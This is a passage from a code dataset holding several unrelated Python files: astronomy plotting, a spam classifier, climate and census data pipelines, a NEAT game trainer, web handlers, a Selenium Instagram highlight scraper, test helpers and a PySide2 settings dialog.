flxs, errs, beams, trans)\n \n BFL, BER = Best_fit_scale(wvs[0], flxs[0], errs[0], Gmfl[0], bp1)\n RFL, RER = Best_fit_scale(wvs[1], flxs[1], errs[1], Gmfl[1], rp1)\n \n return BFL, BER, RFL, RER, Gmfl, wave, F_lam_per_M(flux,wave*(1 + z), z, 0, sp.stellar_mass)*10**lm\n\ndef SF_spec_adjust(Gs, bestfits, z):\n sp = fsps.StellarPopulation(zcontinuous = 1, logzsol = 0, sfh = 3, dust_type = 2)\n sp.params['dust1'] = 0\n \n wvs, flxs, errs, beams, trans = Gather_grism_data_from_2d(Gs, sp)\n\n m, a, m1, m2, m3, m4, m5, m6, lm, d, bp1, rp1, ba, bb, bl, ra, rb, rl= BFS\n\n sp.params['dust2'] = d\n sp.params['logzsol'] = np.log10(m)\n\n time, sfr, tmax = convert_sfh(get_agebins(a, binnum = 6), [m1, m2, m3, m4, m5, m6], maxage = a*1E9)\n\n sp.set_tabular_sfh(time,sfr) \n\n wave, flux = sp.get_spectrum(tage = a, peraa = True)\n\n Gmfl, Pmfl = Full_forward_model(Gs, wave, F_lam_per_M(flux,wave*(1 + z), z, 0, sp.stellar_mass)*10**lm, z, \n wvs, flxs, errs, beams, trans)\n \n BFL, BER = Best_fit_scale(wvs[0], flxs[0], errs[0], Gmfl[0], bp1)\n RFL, RER = Best_fit_scale(wvs[1], flxs[1], errs[1], Gmfl[1], rp1)\n \n return BFL, BER, RFL, RER, Gmfl, wave, F_lam_per_M(flux,wave*(1 + z), z, 0, sp.stellar_mass)*10**lm\n\nfrom spec_id import convert_sfh, Full_forward_model, Full_calibrate_2, get_agebins, F_lam_per_M\n\n\ngs = gridspec.GridSpec(2,2, hspace = 0.3, wspace=0.15)\n\nplt.figure(figsize=[15,8])\n\nLDX = 0 \nTDX = 0\n\n# gid = [36795,45994,21156,39170]\n# field = ['GND','GSD','GND','GSD']\ngid = [16499,45994,16499,45994]\nfield = ['GND','GSD','GND','GSD']\n# usedb = [True, True, False,False]\n# sf = ['SF', 'SF', 'Q', 'Q']\nusedb = [True, True, True, True]\nsf = ['SF', 'SF', 'SF', 'SF']\nfor i in range(4): \n x=i\n Gs = Gen_spec_2D(field[x], gid[x],Adb.query('id == {}'.format(gid[x])).zgrism.values[0], g102_lims=[8200, 11300], g141_lims=[11200, 16000],\n phot_errterm = 0.04, irac_err = 0.08,)\n\n if usedb[x]:\n params = ['m', 'a', 'm1', 'm2', 'm3', 'm4', 'm5', 'm6', 'lm', 'd', 'bp1', \n 'rp1', 'ba', 'bb', 'bl', 'ra', 'rb', 'rl']\n BFS = []\n\n for i in params:\n BFS.append(Adb.query('field == \"{}\" and id == {}'.format(field[x], gid[x]))['bf{}'.format(i)].values[0])\n else:\n BFS = np.load('../data/bestfits/{}_{}_tabfit_bfit.npy'.format(field[x], gid[x]))\n\n\n if sf[x] == 'SF':\n BFL, BER, RFL, RER, Gmfl, wave, flam = SF_spec_adjust(Gs, BFS, Gs.specz)\n else:\n BFL, BER, RFL, RER, Gmfl, wave, flam = Q_spec_adjust(Gs, BFS)\n\n ax = plt.subplot(gs[TDX,LDX])\n if i == 0:\n ax.errorbar(np.log10(Gs.Bwv_rf),BFL*1E18, BER*1E18,\n linestyle='None', marker='o', 
markersize=0.25, color='#1f8ba3', zorder = 2, elinewidth = 0.4, alpha = 1, label = 'G102')\n else:\n ax.errorbar(np.log10(Gs.Bwv_rf),BFL*1E18, BER*1E18,\n linestyle='None', marker='o', markersize=0.25, color='#1f8ba3', zorder = 2, elinewidth = 0.4, alpha = 1)\n ax.plot(np.log10(Gs.Bwv_rf),Gmfl[0] *1E18,'k', zorder = 4, alpha = 0.75)\n IDB = [U for U in range(len(wave)) if wave[U] < Gs.Bwv_rf[0]]\n\n if i ==0:\n ax.errorbar(np.log10(Gs.Rwv_rf),RFL*1E18, RER*1E18,\n linestyle='None', marker='o', markersize=0.25, color='#dc1f22', zorder = 2, elinewidth = 0.4, alpha = 1, label = 'G102')\n else:\n ax.errorbar(np.log10(Gs.Rwv_rf),RFL*1E18, RER*1E18,\n linestyle='None', marker='o', markersize=0.25, color='#dc1f22', zorder = 2, elinewidth = 0.4, alpha = 1)\n ax.plot(np.log10(Gs.Rwv_rf),Gmfl[1] *1E18,'k', zorder = 4, alpha = 0.75)\n IDR = [U for U in range(len(wave)) if wave[U] > Gs.Rwv_rf[-1]]\n\n if i==0:\n ax.errorbar(np.log10(Gs.Pwv_rf),Gs.Pflx*1E18,Gs.Perr*1E18,\n linestyle='None', marker='o', markersize=10, markerfacecolor='#8a1e72', zorder = 1,\n markeredgecolor = '#685877',markeredgewidth = 1, label = 'Photometry')\n else:\n ax.errorbar(np.log10(Gs.Pwv_rf),Gs.Pflx*1E18,Gs.Perr*1E18,\n linestyle='None', marker='o', markersize=10, markerfacecolor='#8a1e72', zorder = 1,\n markeredgecolor = '#685877',markeredgewidth = 1)\n\n ax.plot(np.log10(wave)[IDB],flam[IDB]*1E18,'k', alpha = 0.75, zorder=5)\n ax.plot(np.log10(wave)[IDR],flam[IDR]*1E18,'k', alpha = 0.75)\n ax.set_xlim(np.log10(min(Gs.Pwv_rf)*0.95),np.log10(max(Gs.Pwv_rf)*1.05))\n \n fmax = max(Gs.Rfl *1E18)\n \n if fmax < max(Gs.Bfl *1E18):\n fmax = max(Gs.Bfl *1E18)\n \n if fmax < max(Gs.Pflx *1E18):\n fmax = max(Gs.Pflx *1E18)\n \n \n ax.legend(title ='{}-{}, z={}'.format(field[x], gid[x], np.round(Gs.specz,3)), fontsize = 12)\n ax.set_ylim(-0.1,fmax*1.1)\n ax.set_xticks(np.log10([2500,5000,10000,25000]))\n ax.set_xticklabels(np.array([2500,5000,10000,25000]))\n ax.set_xlabel(r'Wavelength ($\\rm \\AA$)', fontsize=18)\n ax.set_ylabel(r'F$_\\lambda$', fontsize=20)\n ax.tick_params(axis='both', which='major', labelsize=15)\n ax.get_legend().get_title().set_fontsize('15')\n\n if LDX == 0:\n LDX += 1\n else:\n LDX = 0\n TDX +=1\n\nplt.savefig('../plots/evolution_plots/spec_plot.png', bbox_inches = 'tight') \n\n\n\n\n","sub_path":"scripts/evo_spec_data.py","file_name":"evo_spec_data.py","file_ext":"py","file_size_in_byte":7847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"107198406","text":"MAX = 1000000\ndp = [1] * (MAX + 1)\ns = [0] * (MAX + 1)\n\nfor i in range(2, MAX + 1):\n j = 1\n while i * j <= MAX:\n dp[i * j] += i\n j+=1\nfor i in range(1, MAX + 1):\n s[i] = s[i-1] + dp[i]\n\niter = int(input())\nans = []\nfor k in range(iter):\n n = int(input())\n ans.append(s[n])\nprint('\\n'.join(map(str,ans)) + '\\n')\n","sub_path":"Algorithm/Baekjoon/17425.py","file_name":"17425.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"323016647","text":"# importing packages\r\nimport pandas as pd\r\nimport numpy as np\r\n# preprocessing the data\r\ndata = pd.read_csv('spam.csv', encoding = 'latin-1')\r\ndata = data.drop(['Unnamed: 2', 'Unnamed: 3', 'Unnamed: 4'], axis = 1)\r\n# encoding Data\r\ndata['label'] = pd.factorize(data['label'])[0]\r\n# module for removing unwanted words\r\nimport re\r\nimport nltk\r\nnltk.download(\"stopwords\")\r\nfrom nltk.corpus import stopwords\r\n\r\n# for stemming 
words\r\nfrom nltk.stem.porter import PorterStemmer\r\ntemp = []\r\nfor row in data.itertuples():\r\n # to keep a - z letters and 0 - 9\r\n rev = re.sub(\"[^0-9a-zA-Z]\",\" \",row[2])\r\n rev = rev.lower()\r\n rev = rev.split()\r\n ps = PorterStemmer()\r\n rev = [ps.stem(word) for word in rev if not word in set(stopwords.words(\"english\"))]\r\n rev = \" \".join(rev)\r\n temp.append(rev)\r\ndata['msg'] = temp\r\n\r\n# splitting data\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(data['msg'], data['label'], test_size = 0.25)\r\n\r\n# creating bag of words model\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\ncv = CountVectorizer(max_features = 410)\r\ncv.fit(data['msg'])\r\nX_train = cv.transform(X_train)\r\nX_test = cv.transform(X_test)\r\n\r\n# Training classifier\r\nfrom sklearn.svm import SVC\r\nclassifier = SVC(kernel='rbf')\r\nclassifier.fit(X_train, y_train)\r\ny_pred = classifier.predict(X_test)\r\n\r\n#Confusion Matrix [1204 2]\r\n# [82 105] 93.96\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(y_test, y_pred)\r\nprint(cm)","sub_path":"Classification_Trails/On Kaggle/SVM_rbf_Kernal.py","file_name":"SVM_rbf_Kernal.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"506595190","text":"import numpy as np\nfrom sklearn.preprocessing import StandardScaler\n\nfrom ninolearn.utils import include_time_lag\nfrom ninolearn.IO.read_processed import data_reader\n\ndef pipeline(lead_time, return_persistance=False):\n \"\"\"\n Data pipeline for the processing of the data before the Deep Ensemble\n is trained.\n\n :type lead_time: int\n :param lead_time: The lead time in month.\n\n :type return_persistance: boolean\n :param return_persistance: Return as the persistance as well.\n\n :returns: The feature \"X\" (at observation time), the label \"y\" (at lead\n time), the target season \"timey\" (least month) and if selected the\n label at observation time \"y_persistance\". 
Hence, the output comes as:\n X, y, timey, y_persistance.\n \"\"\"\n reader = data_reader(startdate='1960-01', enddate='2017-12')\n\n # indeces\n oni = reader.read_csv('oni')\n\n iod = reader.read_csv('iod')\n wwv = reader.read_csv('wwv_proxy')\n\n # seasonal cycle\n sc = np.cos(np.arange(len(oni))/12*2*np.pi)\n\n # network metrics\n network_ssh = reader.read_statistic('network_metrics', variable='zos', dataset='ORAS4', processed=\"anom\")\n c2_ssh = network_ssh['fraction_clusters_size_2']\n H_ssh = network_ssh['corrected_hamming_distance']\n\n #wind stress\n taux = reader.read_netcdf('taux', dataset='NCEP', processed='anom')\n\n taux_WP = taux.loc[dict(lat=slice(2.5,-2.5), lon=slice(120, 160))]\n taux_WP_mean = taux_WP.mean(dim='lat').mean(dim='lon')\n\n # decadel variation of leading eof\n pca_dec = reader.read_statistic('pca', variable='dec_sst', dataset='ERSSTv5', processed='anom')['pca1']\n\n\n # time lag\n time_lag = 12\n\n # shift such that lead time corresponds to the definition of lead time\n shift = 3\n\n # process features\n feature_unscaled = np.stack((oni, sc, wwv, iod,\n taux_WP_mean,\n c2_ssh, H_ssh,\n pca_dec), axis=1)\n\n # scale each feature\n scalerX = StandardScaler()\n Xorg = scalerX.fit_transform(feature_unscaled)\n\n # set nans to 0.\n Xorg = np.nan_to_num(Xorg)\n\n # arange the feature array\n X = Xorg[:-lead_time-shift,:]\n X = include_time_lag(X, max_lag=time_lag)\n\n # arange label\n yorg = oni.values\n y = yorg[lead_time + time_lag + shift:]\n\n # get the time axis of the label\n timey = oni.index[lead_time + time_lag + shift:]\n\n if return_persistance:\n y_persistance = yorg[time_lag: - lead_time - shift]\n return X, y, timey, y_persistance\n else:\n return X, y, timey","sub_path":"research/Master_Thesis/data_pipeline.py","file_name":"data_pipeline.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"479117993","text":"\"\"\"\n2-input XOR example -- this is most likely the simplest possible example.\n\"\"\"\n\nfrom __future__ import print_function\nimport os\nimport neat, GameController, pickle\n# 2-input XOR inputs and expected outputs.\npac_inputs = [(0, 0, 0, 0, 1, 1, 1, 0, 0, -1), (0, 0, 0, 0, 1, 1, 0, 1, 0, 1), (0, 0, 0, 0, 0, 1, 1, 1, -1, 0), (0, 0, 0, 0, 1, 0, 1, 1, 1, 0)]\npac_outputs = [\"left\", \"right\", \"up\", \"down\"]\n\n\nclass NEATHandler(object):\n\n def __init__(self, gens):\n self.gens = gens\n self.gen = 1\n self.num = 1\n self.numPerGen = 50\n\n self.run()\n\n def eval_genomes(self, genomes, config):\n for genome_id, genome in genomes:\n self.game_over = False\n self.final_score = 0\n self.inputs = []\n self.net = neat.nn.FeedForwardNetwork.create(genome, config)\n game = GameController.GameController(self)\n\n while not self.game_over:\n pass\n genome.fitness = self.final_score\n\n if self.num % self.numPerGen == 0:\n self.num = 1\n self.gen += 1\n self.num += 1\n\n def select_key_from_net(self):\n outputs = self.net.activate(self.inputs)\n return pac_outputs[outputs.index(max(outputs))]\n\n def end_game(self, score):\n self.game_over = True\n self.final_score = score\n\n def set_inputs(self, inputs):\n self.inputs = inputs\n\n def run(self):\n # Load configuration.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-feedforward')\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_path)\n\n # Create the population, which is the 
top-level object for a NEAT run.\n p = neat.Population(config)\n\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n p.add_reporter(neat.Checkpointer(1, filename_prefix=\"./NeatCheckpoints/neat-checkpoint-\"))\n\n winner = p.run(self.eval_genomes, self.gens)\n\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n with open('winner-feedforward', 'wb') as f:\n pickle.dump(winner, f)\n\n\nif __name__ == '__main__':\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n\n NEATHandler(1000)\n","sub_path":"NEATHandler.py","file_name":"NEATHandler.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"581639403","text":"# -*- coding:utf-8 -*-\nimport random\n\nimport tornado.escape\nimport tornado.web\nfrom torcms.core import tools\n\nimport config\nfrom torcms.core.base_handler import BaseHandler\nfrom torcms.handlers.info_handler import InfoHandler\n\n\nclass InforRedirectHandler(BaseHandler):\n def get(self, url_str):\n self.redirect('/map/{0}'.format(url_str))\n\nclass MapHandler(InfoHandler):\n\n def extra_kwd(self, info_rec):\n\n post_data = {}\n for key in self.request.arguments:\n post_data[key] = self.get_arguments(key)\n\n out_dic = {\n 'marker': 1 if 'marker' in post_data else 0,\n 'geojson': post_data['gson'][0] if 'gson' in post_data else '',\n 'map_hist_arr': self.extra_view(info_rec.uid),\n\n }\n if 'zoom' in post_data :\n out_dic['vzoom'] = post_data['zoom'][0]\n if 'lat' in post_data :\n out_dic['vlat'] = post_data['lat'][0]\n if 'lon' in post_data :\n out_dic['vlon'] = post_data['lon'][0]\n return out_dic\n\n\n def extra_view(self, app_id):\n qian = self.get_secure_cookie('map_hist')\n if qian:\n qian = qian.decode('utf-8')\n else:\n qian = ''\n self.set_secure_cookie('map_hist', (app_id + qian)[:20])\n map_hist = []\n if self.get_secure_cookie('map_hist'):\n for xx in range(0, len(self.get_secure_cookie('map_hist').decode('utf-8')), 4):\n map_hist.append(self.get_secure_cookie('map_hist').decode('utf-8')[xx: xx + 4])\n return map_hist\n\n def get_tmpl_name(self, rec):\n if 'fullscreen' in self.request.arguments:\n tmpl = 'infor/app/full_screen.html'\n else:\n\n tmpl = 'infor/app/show_map.html'\n return tmpl\n","sub_path":"extor/handlers/map_handler.py","file_name":"map_handler.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"431118895","text":"import sys\nimport os\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\nimport requests\nimport json\nimport ast\nimport numpy\nimport datetime\nimport csv\nimport errno\nimport analysis\n\nBASE_URL = \"http://api.census.gov/data/2014/acs5\"\nBASE = \"/Users/willsumfest/preto3\"\nCOUNTY_FILE = BASE + \"/census/ca_counties.csv\"\n\n\"\"\"\nFunctionality of mkdir -p in unix command line system.\n\"\"\"\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\"\"\"\nFunction that takes a list of parameters and a county and creates a census url for a request.\nNote that the state is 06 since we are working exclusively in california in this stage.\n\"\"\"\ndef make_url(parameters, 
county=\"\"):\n head = dirname(os.getcwd())\n dotenv_path = join(head, '.env')\n load_dotenv(dotenv_path)\n parameters = make_params(parameters)\n if county != \"\":\n url = BASE_URL + \"?get=\" + parameters + \"&for=county:\" + county + \"&in=state:06&key=\" + os.environ.get('CENSUS_API_KEY')\n else:\n url = BASE_URL + \"?get=\" + parameters + \"&for=state:06&key=\" + os.environ.get('CENSUS_API_KEY')\n return url\n\n\n\"\"\"\nCreates a string from a list of parameters.\n\"\"\"\ndef make_params(parameters):\n params = \"\"\n for item in parameters:\n params += str(item) + \",\"\n params = params[:-1]\n return params\n \n\"\"\"\nReceives data from the census format and post processes it into relational data to insert into csv file.\nWe will use this csv file to perform our statistical analysis.\n\"\"\"\ndef post_process(data, county_code=\"\"):\n evaluation = ast.literal_eval(data)\n a = numpy.asarray(evaluation)\n if county_code != \"\":\n Dir = os.getcwd() + \"/simulations/\" + county_code\n mkdir_p(Dir)\n name = Dir + \"/\" + datetime.datetime.now().strftime('%Y-%m-%d-%H:%M') + \".csv\"\n else:\n Dir = os.getcwd() + \"/simulations/\" + \"CA_whole\"\n mkdir_p(Dir)\n name = Dir + \"/\" + datetime.datetime.now().strftime('%Y-%m-%d-%H:%M') + \".csv\"\n numpy.savetxt(name, a, delimiter=\",\", fmt=\"%s\")\n return\n\n\n\"\"\"\nWe need a county and a list of parameters, and we will make an api request to the census.\n\"\"\"\ndef main(parameters):\n #For all counties in CA\n with open(COUNTY_FILE, \"r\") as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n county_code = row[\"county_code\"]\n url = make_url(parameters, county=county_code)\n response = requests.get(url)\n post_process(response.text, county_code=county_code)\n #For CA as a whole\n url = make_url(parameters)\n response = requests.get(url)\n post_process(response.text)\n analysis.main()\n return\n \n\nif __name__ == '__main__':\n os.chdir(BASE + \"/census\")\n parameters = [\"B01001_001E\", \"B01001_001M\", \"B06009_001E\", \"B06009_001M\", \"B06009_002E\", \"B06009_002M\"]\n main(parameters)\n\n","sub_path":"census/demographics.py","file_name":"demographics.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"29350872","text":"from django.conf.urls import url, include\n\nfrom mdta.apps.projects import views\n\nurlpatterns = [\n url(r'^$', views.projects, name='projects'),\n url(r'^project_dashboard', views.project_dashboard, name='project_dashboard'),\n url(r'^project_config/(?P\\d+)/$', views.project_config, name='project_config'),\n url(r'^new/$', views.project_new, name='project_new'),\n url(r'^edit/(?P\\d+)/$', views.project_edit, name='project_edit'),\n\n url(r'^module_new/$', views.module_new, name='module_new'),\n url(r'^module_edit/(?P\\d+)/$', views.module_edit, name='module_edit'),\n\n url(r'^test_header_new/$', views.test_header_new, name='test_header_new'),\n url(r'^test_header_edit/$', views.test_header_edit, name='test_header_edit'),\n\n url(r'^language_new/$', views.language_new, name='language_new'),\n url(r'^language_new_from_module_import/$', views.language_new_from_module_import, name='language_new_from_module_import'),\n url(r'^get_language_detail_for_import_module/$', views.get_language_detail_for_import_module, name='get_language_detail_for_import_module'),\n url(r'^language_edit/$', views.language_edit, name='language_edit'),\n\n url(r'^fetch_project_catalogs_members', 
views.fetch_project_catalogs_members, name='fetch_project_catalogs_members'),\n\n url(r'^project_data_migrate/(?P\\d+)/$', views.project_data_migrate, name='project_data_migrate'),\n\n url(r'^', include('mdta.apps.projects.urls_dbset')),\n]\n","sub_path":"mdta/apps/projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"363788925","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\nimport urllib3, shutil\nfrom account import *\n\nbrowser = webdriver.Chrome()\naction = ActionChains(browser)\npublic_url = 'https://www.instagram.com/accounts/login/?next=/gnfi/'\n\nbrowser.get(public_url)\ntime.sleep(1)\nurlnow = browser.current_url.split(\"/\")\ntime.sleep(1)\n\ndata_posters = []\n\ndef xpathselector(xpath):\n return browser.find_element_by_xpath(xpath)\n\ndef check_exists_by_class(classname):\n try:\n browser.find_element_by_class_name(classname)\n except NoSuchElementException:\n return False\n return True\n\ndef check_exists_by_xpath(xpath):\n try:\n browser.find_element_by_xpath(xpath)\n except NoSuchElementException:\n return False\n return True\n\nusername = xpathselector('//*[@id=\"loginForm\"]/div/div[1]/div/label/input').send_keys(account[0])\npassword = xpathselector('//*[@id=\"loginForm\"]/div/div[2]/div/label/input').send_keys(account[1])\nbtn_login = xpathselector('//*[@id=\"loginForm\"]/div/div[3]/button').click()\ntime.sleep(6)\nxpathselector('//*[@id=\"react-root\"]/section/main/div/div/div/div/button').click()\ntime.sleep(3)\nif(check_exists_by_class('_54f4m') == True):\n print('private')\nelse:\n _current_highlight = 1\n highlight_count = browser.find_elements_by_class_name('Ckrof')\n if len(highlight_count) > 3:\n while _current_highlight <= len(highlight_count): \n currentpath = f'//*[@id=\"react-root\"]/section/main/div/div[1]/div/div/div/ul/li[{_current_highlight + 2}]' \n try:\n xpathselector(currentpath).click()\n time.sleep(3)\n _current_stories = 0\n stories_count = browser.find_elements_by_class_name('_7zQEa')\n print(_current_highlight, len(stories_count))\n xpathselector('//*[@id=\"react-root\"]/section/div[3]/button').click()\n if _current_highlight == highlight_count:\n break\n if _current_highlight >= 8:\n nexthighlight = xpathselector('//*[@id=\"react-root\"]/section/main/div/div[1]/div/button').click()\n xpathselector(currentpath).click()\n time.sleep(3)\n _current_stories = 0\n stories_count = browser.find_elements_by_class_name('_7zQEa')\n print(_current_highlight, len(stories_count))\n xpathselector('//*[@id=\"react-root\"]/section/div[3]/button').click()\n _current_highlight += 1\n except:\n pass \n else:\n currentpath = f'//*[@id=\"react-root\"]/section/main/div/div[1]/div/div/div/ul/li[{_current_highlight + 2}]'\n xpathselector(currentpath).click()\n time.sleep(2)\n stories_count = browser.find_elements_by_class_name('_7zQEa')\n print(len(stories_count))\n # browser.quit()\n \n\n# try:\n# nexthighlight = xpathselector('//*[@id=\"react-root\"]/section/main/div/div[1]/div/button')\n# action.double_click(nexthighlight).perform()\n# except:\n# pass\n \n\n\n \n\n\n\n\n\n\n\n \n\n\n\n \n\n \n\n\n \n \n\n\n\n\n\n\n\n\n","sub_path":"WEEK 
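# Hedged usage sketch for the named URL patterns above (Django >= 1.10 import path; the
# pk value 42 is hypothetical):
from django.urls import reverse
edit_url = reverse('project_edit', args=[42])   # resolves the 'project_edit' pattern by name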
10/scrap_highlight.py","file_name":"scrap_highlight.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"604728407","text":"# coding: utf8\nfrom __future__ import unicode_literals\nimport unittest\nfrom tempfile import mkdtemp\nimport sys\nfrom contextlib import contextmanager\n\nfrom six import BytesIO, StringIO\n\nfrom clldutils.path import Path, rmtree\nfrom clldutils.misc import nfilter\n\nfrom beastling.configuration import Configuration\n\n\nCACHE = dict(classifications=None, locations=None, glotto_macroareas=None)\n\n#### Below is rescued code from clldutils/testing.py which has been removed.\n#### This is a hacky temp fix until BEASTling adopts pytest.\n\nclass WithTempDirMixin(object):\n \"\"\"\n Composable test fixture providing access to a temporary directory.\n\n http://nedbatchelder.com/blog/201210/multiple_inheritance_is_hard.html\n \"\"\"\n def setUp(self):\n super(WithTempDirMixin, self).setUp()\n self.tmp = Path(mkdtemp())\n\n def tearDown(self):\n rmtree(self.tmp, ignore_errors=True)\n super(WithTempDirMixin, self).tearDown()\n\n def tmp_path(self, *comps):\n return self.tmp.joinpath(*comps)\n\n\nclass WithTempDir(WithTempDirMixin, unittest.TestCase):\n \"\"\"\n Backwards compatible test base class.\n \"\"\"\n\n\n@contextmanager\ndef capture(func, *args, **kw):\n with capture_all(func, *args, **kw) as res:\n yield res[1]\n\n\n@contextmanager\ndef capture_all(func, *args, **kw):\n out, sys.stdout = sys.stdout, StringIO()\n err, sys.stderr = sys.stderr, StringIO()\n ret = func(*args, **kw)\n sys.stdout.seek(0)\n sys.stderr.seek(0)\n yield ret, sys.stdout.read(), sys.stderr.read()\n sys.stdout, sys.stderr = out, err\n\n#### End of clldutils/testing.py code\n\nclass WithConfigAndTempDir(WithTempDir):\n def make_cfg(self, configfile, from_cache=True):\n config = Configuration(configfile=configfile)\n if from_cache:\n if not CACHE['classifications']:\n try:\n config.process()\n for k in CACHE:\n CACHE[k] = getattr(config, k)\n except:\n pass\n if CACHE['classifications']:\n for k, v in CACHE.items():\n setattr(config, k, v)\n return config\n\n\ndef tests_path(*comps):\n return Path(__file__).parent.joinpath(*nfilter(comps))\n\n\ndef data_path(*comps):\n return tests_path('data', *comps)\n\n\ndef config_path(name, bad=False):\n if not name.endswith('.conf'):\n name += '.conf'\n return tests_path('configs', 'bad_configs' if bad else None, name)\n\n\n@contextmanager\ndef old_capture(func, *args, **kw):\n out, sys.stdout = sys.stdout, BytesIO()\n oute, sys.stderr = sys.stderr, BytesIO()\n func(*args, **kw)\n sys.stdout.seek(0)\n sys.stderr.seek(0)\n yield sys.stdout.read(), sys.stderr.read()\n sys.stdout, sys.stderr = out, oute\n","sub_path":"tests/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"48143226","text":"import sys\n\nfrom PySide2 import QtCore, QtGui, QtWidgets\nfrom threading import Thread\n\ntry:\n\tfrom . 
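# Hedged usage sketch for the capture() helper defined above (_demo is a hypothetical
# function introduced only for illustration):
def _demo():
    print('hello from stdout')

with capture(_demo) as out:       # capture() yields whatever _demo wrote to stdout
    assert 'hello from stdout' in out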
import res_rc\nexcept ImportError:\n\timport res_rc\n\n\nCONNECT = \"user.connect\"\nDISCONNECT = \"user.disconnect\"\nNICK_CHANGE = \"user.rename\"\nNICK_SET = \"user.setname\"\nGET_ID = \"user.getid\"\nCHECK = \"user.check\"\nMSG = \"messages.send\"\n\n\nclass Ui_Dialog(object):\n\tdef setupUi(self, Dialog):\n\t\tDialog.setObjectName(\"Dialog\")\n\t\tDialog.resize(410, 140)\n\t\tDialog.setMinimumSize(QtCore.QSize(410, 140))\n\t\tDialog.setMaximumSize(QtCore.QSize(410, 140))\n\t\ticon = QtGui.QIcon()\n\t\ticon.addPixmap(QtGui.QPixmap(\":/menuBar/icons/settings.png\"),\n\t\t\t\t\t QtGui.QIcon.Normal, QtGui.QIcon.Off)\n\t\tDialog.setWindowIcon(icon)\n\t\tself.generalBox = QtWidgets.QGroupBox(Dialog)\n\t\tself.generalBox.setGeometry(QtCore.QRect(10, 10, 391, 81))\n\t\tself.generalBox.setStyleSheet(\"QGroupBox {\\n\"\n\t\t\t\t\t\t\t\t\t \"font-size: 12px;\\n\"\n\t\t\t\t\t\t\t\t\t \"}\\n\"\n\t\t\t\t\t\t\t\t\t \"QLabel {\\n\"\n\t\t\t\t\t\t\t\t\t \"font-size: 13px;\\n\"\n\t\t\t\t\t\t\t\t\t \"}\")\n\t\tself.generalBox.setObjectName(\"generalBox\")\n\t\tself.formLayoutWidget = QtWidgets.QWidget(self.generalBox)\n\t\tself.formLayoutWidget.setGeometry(QtCore.QRect(9, 20, 201, 48))\n\t\tself.formLayoutWidget.setObjectName(\"formLayoutWidget\")\n\t\tself.generalForm = QtWidgets.QFormLayout(self.formLayoutWidget)\n\t\tself.generalForm.setContentsMargins(0, 0, 0, 0)\n\t\tself.generalForm.setObjectName(\"generalForm\")\n\t\tself.nicknameLabel = QtWidgets.QLabel(self.formLayoutWidget)\n\t\tself.nicknameLabel.setStyleSheet(\"\")\n\t\tself.nicknameLabel.setObjectName(\"nicknameLabel\")\n\t\tself.generalForm.setWidget(\n\t\t\t0, QtWidgets.QFormLayout.LabelRole, self.nicknameLabel)\n\t\tself.nicknameLine = QtWidgets.QLineEdit(self.formLayoutWidget)\n\t\tself.nicknameLine.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n\t\tself.nicknameLine.setAcceptDrops(False)\n\t\tself.nicknameLine.setInputMethodHints(QtCore.Qt.ImhLatinOnly)\n\t\tself.nicknameLine.setMaxLength(13)\n\t\tself.nicknameLine.setPlaceholderText(\"\")\n\t\tself.nicknameLine.setClearButtonEnabled(False)\n\t\tself.nicknameLine.setObjectName(\"nicknameLine\")\n\t\tself.generalForm.setWidget(\n\t\t\t0, QtWidgets.QFormLayout.FieldRole, self.nicknameLine)\n\t\tself.hostLabel = QtWidgets.QLabel(self.formLayoutWidget)\n\t\tself.hostLabel.setStyleSheet(\"\")\n\t\tself.hostLabel.setObjectName(\"hostLabel\")\n\t\tself.generalForm.setWidget(\n\t\t\t1, QtWidgets.QFormLayout.LabelRole, self.hostLabel)\n\t\tself.hostLine = 